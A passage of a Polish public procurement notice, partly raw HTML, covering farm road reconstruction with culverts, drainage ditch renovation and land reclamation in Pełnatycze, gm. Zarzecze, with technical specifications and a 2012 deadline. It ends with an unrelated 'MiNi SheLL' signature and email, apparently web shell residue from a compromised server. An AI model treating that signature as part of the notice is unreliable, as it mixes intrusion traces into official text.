Odwodnienie dróg z wód opadowych i roztopowych realizowane będzie systemem rowów przydrożnych z odprowadzeniem do cieków otwartych - rowy melioracyjne i rzeka Mleczka. Na skrzyżowaniach dróg zakłada się przepusty od Dn400 do Dn800
Przepusty pod zjazdami na posesje - należy wykonać tak, aby każdy użytkownik dysponował wspólnym (z jednym sąsiadem) zjazdem na swoją działkę. 
Szerokość zjazdów - 6,00 m.
Rura przepustowa o średnicy 400 i 600 mm
Zadanie nr 2 - Renowacja rowów melioracyjnych o łącznej długości 5,70 km
Zadanie nr 3 -Rekultywacja gruntów - powierzchnia 20,0 ha
Rekultywacja terenów polegać będzie na:
- głębokim przeoraniu nieużytków - ugorów i łąk
- wycięciu krzaków i drzew wraz z usunięciem pni
- likwidacji wysokich miedz
- rekultywacji starych dróg - wywóz materiałów na utwardzenie i dowóz humusu
obsługa geodezyjna w trakcie realizacji robót wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej.
- opracowania operatu powykonawczego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.24-4, 45.11.23.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II - miejscowość Pełnatycze, gm. Zarzecze:
Zadanie nr 4 - Przebudowa dróg transportu rolnego(poscaleniowych) wraz z przepustami pod drogami i zjazdami do działek o łącznej długości 24,10 km
Zadanie nr 5 - Renowacja rowów melioracyjnych o łącznej długości 6,30 km
Zadanie nr 6 -Rekultywacja gruntów - powierzchnia 10,0 ha
dla projektu:
-Scalenie gruntów wsi Pełnatycze, gm. Zarzecze na obszarze 533,89 ha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II - miejscowość Pełnatycze:
Zadanie nr 4 - Przebudowa dróg transportu rolnego wraz z przepustami pod drogami i zjazdami do działek o łącznej długości 24,10 km
a)	Lokalizację poszczególnych odcinków dróg (drogi utwardzone oraz o nawierzchni gruntowej - tzw. zielone i do przetarcia) objętych przetargiem przedstawiono 
w części rysunkowej projektu wykonawczego, na planie orientacyjnym w skali 1:10 000 oraz na planie sytuacyjnym w skali 1:2000
b)	Opis stanu projektowanego - parametry techniczne (drogi utwardzone)
- klasa drogi - D (dojazdowa)
- szerokość jezdni - 2,50 m
- prędkość projektowana - 30 kmh
- szerokość poboczy (tłuczniowych) -0,25 m
- szerokość poboczy gruntowych - zmienna, od 0,50 m do 1,70 m
- spadek poprzeczny jednostronny i dwustronny jezdni - 2,00%
- odwodnienie powierzchniowe za pomocą rowów przydrożnych
c)	Konstrukcja elementów dróg utwardzonych:
Jezdnia:
- nawierzchnia z klińca łamanego 1-4 o grubości 3,00 cm
- Geosiatka komórkowa perforowana wys. 150 mm wypełniona kruszywem ziarnistym 0-63 ,o grubości 15,00 cm
- kruszywo łamane stabilizowane mechanicznie 0-31,5 o grubości 25,00 cm
- podłoże gruntowe
Pobocza gruntowe:
- materiał z wykopów
- podłoże gruntowe
d)	Odwodnienie:
Odwodnienie dróg z wód opadowych i roztopowych realizowane będzie systemem rowów przydrożnych z odprowadzeniem do cieków otwartych - rowy melioracyjne i rzeka Mleczka. Na skrzyżowaniach dróg zakłada się przepusty od Dn400 do Dn800
Przepusty pod zjazdami na posesje - należy wykonać tak, aby każdy użytkownik dysponował wspólnym (z jednym sąsiadem) zjazdem na swoją działkę. 
Szerokość zjazdów - 6,00 m.
Rura przepustowa o średnicy 400 i 600 mm
Zadanie nr 5 - Renowacja rowów melioracyjnych o łącznej długości 6,30 km
Zadanie nr 6 -Rekultywacja gruntów - powierzchnia 10,0 ha
Rekultywacja terenów polegać będzie na:
- głębokim przeoraniu nieużytków - ugorów i łąk
- wycięciu krzaków i drzew wraz z usunięciem pni
- likwidacji wysokich miedz
- rekultywacji starych dróg - wywóz materiałów na utwardzenie i dowóz humusu
obsługa geodezyjna w trakcie realizacji robót wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej.
- opracowania operatu powykonawczego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.24-4, 45.11.23.30-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com